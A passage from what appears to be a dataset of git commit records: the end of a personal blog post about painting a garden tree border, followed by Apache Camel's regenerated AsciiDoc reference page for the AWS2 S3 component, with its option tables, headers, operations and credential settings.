Masters North Lakes, after they gave us a whole stack of mistint tins as part of a Sausage Sizzle Fundraiser we conducted. Our childs' Kindergarten couldn't accept them due to the paint not being non-toxic, so we saved this colour specifically for this job, and gave the other tin to them for minor touch-ups around the Kindy. \n\n\nBecasue this wasn't a standard fence paint, I needed to undercoat before painting with two top coats. This quite literally took all weekend last weekend. I _nearly_ had enough undercoat to get the job done, but I had to fork out about $25 for a new tin. Undercoat is a good thing to have around anyhow, so I wan't too worried.\n\n== Measure Twice, Then Check The Fit, Then Cut\n\nEven though I measured once, measured twice, I still had some issues with measurements. A quick cut here and there fixed that. I got it mostly right. I had assembly knocked over this morning. The key with this type of thing is to paint the planks first before assembly. Then only cut one end of the plank if you need to make adjustments. This way you don't need to repaint the raw edge becasue it is abutted against a painted side. \n\n== All In All, Not A Bad Job\n\nAll in all, they've come up really nicely. All up, I spent about $100 including some tools I needed for the job. Most of the expense was for the plank of plywood I used to convert my glass-top office desk to a workbench. 
That paid dividends these two weekends for sure.\n\nimage::Tree_Border_Two.jpg[title=\"Being Frugal Pays\", width=\"300, height=\"500\"]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cf07a79ad1a61b50a62de27b3a632b6567186c95","subject":"Regen docs","message":"Regen docs\n","repos":"pax95\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,christophd\/camel,pax95\/camel,christophd\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_contents":"[[aws2-s3-component]]\n= AWS S3 Storage Service Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-aws\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc\n:docTitle: AWS S3 Storage Service\n:artifactId: camel-aws2-s3\n:description: Store and retrieve objects from AWS S3 Storage Service using AWS SDK version 2.x.\n:since: 3.2\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/aws2-s3.adoc[opts=optional]\n\/\/Manually maintained attributes\n:group: AWS\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 S3 component supports storing and retrieving objects from\/to\nhttps:\/\/aws.amazon.com\/s3[Amazon's S3] service.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon S3. More information is available at\nhttps:\/\/aws.amazon.com\/s3[Amazon S3].\n\n== URI Format\n\n------------------------------\naws2-s3:\/\/bucketNameOrArn[?options]\n------------------------------\n\nThe bucket will be created if it don't already exists. +\n You can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n\n\/\/ component-configure options: START\n== Configuring Options\n\nCamel components are configured on two separate levels:\n\n- component level\n- endpoint level\n\n=== Configuring Component Options\n\nThe component level is the highest level which holds general and common configurations that are inherited by the endpoints.\nFor example a component may have security settings, credentials for authentication, urls for network connection and so forth.\n\nSome components only have a few options, and others may have many. Because components typically have pre configured defaults\nthat are commonly used, then you may often only need to configure a few options on a component; or none at all.\n\nConfiguring components can be done with the xref:latest@manual::component-dsl.adoc[Component DSL],\nin a configuration file (application.properties|yaml), or directly with Java code.\n\n=== Configuring Endpoint Options\n\nWhere you find yourself configuring the most is on endpoints, as endpoints often have many options, which allows you to\nconfigure what you need the endpoint to do. 
The options are also categorized into whether the endpoint is used as consumer (from)\nor as a producer (to), or used for both.\n\nConfiguring endpoints is most often done directly in the endpoint URI as path and query parameters. You can also use\nthe xref:latest@manual::Endpoint-dsl.adoc[Endpoint DSL] as a _type safe_ way of configuring endpoints.\n\nA good practice when configuring options is to use xref:latest@manual::using-propertyplaceholder.adoc[Property Placeholders],\nwhich allows to not hardcode urls, port numbers, sensitive information, and other settings.\nIn other words placeholders allows to externalize the configuration from your code, and gives more flexibility and reuse.\n\nThe following two sections lists all the options, firstly for the component followed by the endpoint.\n\/\/ component-configure options: END\n\n\/\/ component options: START\n== Component Options\n\n\nThe AWS S3 Storage Service component supports 50 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *configuration* (common) | The component configuration | | AWS2S3Configuration\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. 
| false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. 
If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. 
This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\n== Endpoint Options\n\nThe AWS S3 Storage Service endpoint is configured using URI syntax:\n\n----\naws2-s3:\/\/bucketNameOrArn\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketNameOrArn* | *Required* Bucket name or ARN | | String\n|===\n\n\n=== Query Parameters (68 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. 
| false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *maxConnections* (consumer) | Set the maxConnections parameter in the S3 client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. 
Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. 
There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. 
| true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\nRequired S3 component options\n\nYou have to provide the amazonS3Client in the\nRegistry, or your accessKey and secretKey, to access\nhttps:\/\/aws.amazon.com\/s3[Amazon's S3].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you, for instance, to know how many messages exist in this\nbatch, and to let the Aggregator\naggregate this number of messages.\n\n== Usage\n\nFor example, in order to read the file `hello.txt` from the bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n=== Message headers evaluated by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3BucketName` |`String` |The bucket name in which this object will be stored, or which will be used for the current operation\n\n|`CamelAwsS3BucketDestinationName` |`String` |The destination bucket name which will be used for the current operation\n\n|`CamelAwsS3ContentLength` |`Long` |The content length of this object.\n\n|`CamelAwsS3ContentType` |`String` |The content type of this object.\n\n|`CamelAwsS3ContentControl` |`String` |The content control of this object.\n\n|`CamelAwsS3ContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelAwsS3ContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelAwsS3ContentMD5` |`String` |The md5 checksum of this object.\n\n|`CamelAwsS3DestinationKey` |`String` |The destination key which will be used for the current operation\n\n|`CamelAwsS3Key` |`String` |The key under which this object will be stored, or which will be used for the current operation\n\n|`CamelAwsS3LastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelAwsS3Operation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, listBuckets, deleteBucket, listObjects\n\n|`CamelAwsS3StorageClass` |`String` |The storage class of this object.\n\n|`CamelAwsS3CannedAcl` |`String` |The canned acl that will be applied to the object. See\n`software.amazon.awssdk.services.s3.model.ObjectCannedACL` for allowed\nvalues.\n\n|`CamelAwsS3Acl` |`software.amazon.awssdk.services.s3.model.BucketCannedACL` |A well-constructed Amazon S3 Access Control List object.\nSee `software.amazon.awssdk.services.s3.model.BucketCannedACL` for more details\n\n|`CamelAwsS3Headers` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelAwsS3ServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using AWS-managed keys. 
For example use AES256.\n\n|`CamelAwsS3VersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|`CamelAwsS3Metadata` |`Map<String, String>` |A map of metadata stored with the object in S3.\n|=======================================================================\n\n=== Message headers set by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelAwsS3ETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelAwsS3VersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\n|=======================================================================\n\n=== Message headers set by the S3 consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3Key` |`String` |The key under which this object is stored.\n\n|`CamelAwsS3BucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelAwsS3ETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Amazon S3.\n\n|`CamelAwsS3LastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Amazon S3 last recorded a modification to the associated object.\n\n|`CamelAwsS3VersionId` |`String` |The version ID of the associated Amazon S3 object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Amazon\nS3 bucket that has object versioning enabled.\n\n|`CamelAwsS3ContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelAwsS3ContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. 
This data is used as a\nmessage integrity check to verify that the data received by Amazon S3 is\nthe same data that the caller sent.\n\n|`CamelAwsS3ContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelAwsS3ContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelAwsS3ContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelAwsS3ContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelAwsS3ServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using AWS-managed keys.\n|=======================================================================\n\n=== S3 Producer operations\n\nThe Camel AWS2 S3 component provides the following operations on the producer side:\n\n- copyObject\n- deleteObject\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return an S3Object instance)\n- getObjectRange (this will return an S3Object instance)\n- createDownloadLink\n\nIf you don't specify an operation explicitly, the producer will do:\n\n- a single file upload\n- a multipart upload if the multiPartUpload option is enabled\n\n=== Advanced AmazonS3 configuration\n\nIf your Camel application is running behind a firewall, or if you need to\nhave more control over the `S3Client` instance configuration, you can\ncreate your own instance and refer to it in your Camel aws2-s3 component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/MyBucket?amazonS3Client=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n
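\nFor reference, one possible way to make such a client available under the `#client` name is to bind it into the Camel registry. This is only a sketch, assuming Camel 3's `Registry` API and static credentials (the credential values are placeholders); adapt it to your own setup:\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Sketch: build a custom S3Client and bind it as \"client\" in the registry,\n\/\/ so that endpoints can refer to it via amazonS3Client=#client.\nS3Client client = S3Client.builder()\n        .credentialsProvider(StaticCredentialsProvider.create(\n                AwsBasicCredentials.create(\"yourAccessKey\", \"yourSecretKey\")))\n        .region(Region.EU_WEST_1)\n        .build();\n\ncamelContext.getRegistry().bind(\"client\", client);\n--------------------------------------------------------------------------------\n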
\n=== Use KMS with the S3 component\n\nTo use AWS KMS to encrypt\/decrypt data by using AWS infrastructure, you can use the options introduced in 2.21.x, as in the following example:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"file:tmp\/test?fileName=test.txt\")\n .setHeader(AWS2S3Constants.KEY, constant(\"testFile\"))\n .to(\"aws2-s3:\/\/mybucket?amazonS3Client=#client&useAwsKMS=true&awsKMSKeyId=3f0637ad-296a-3dfe-a796-e60654fb128c\");\n--------------------------------------------------------------------------------\n\nIn this way you ask S3 to use the KMS key 3f0637ad-296a-3dfe-a796-e60654fb128c to encrypt the file test.txt. When you ask to download this file, the decryption will be done directly before the download.\n\n=== Static credentials vs Default Credential Provider\n\nYou have the possibility of avoiding the usage of explicit static credentials by specifying the useDefaultCredentialsProvider option and setting it to true. The credentials will then be resolved through the SDK's default credential provider chain, which searches in the following order:\n\n - Java system properties - aws.accessKeyId and aws.secretKey\n - Environment variables - AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.\n - Web Identity Token from AWS STS.\n - The shared credentials and config files.\n - Amazon ECS container credentials - loaded from Amazon ECS if the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is set.\n - Amazon EC2 Instance profile credentials. \n\nFor more information about this you can look at the https:\/\/docs.aws.amazon.com\/sdk-for-java\/latest\/developer-guide\/credentials.html[AWS credentials documentation].\n
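\nAs a minimal sketch (the bucket name and region below are illustrative), a consumer route relying on the default credential provider chain could look like this:\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ No accessKey\/secretKey in the URI: the SDK default credential provider chain is used.\nfrom(\"aws2-s3:\/\/mycamelbucket?useDefaultCredentialsProvider=true&region=eu-west-1\")\n    .to(\"mock:result\");\n--------------------------------------------------------------------------------\n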
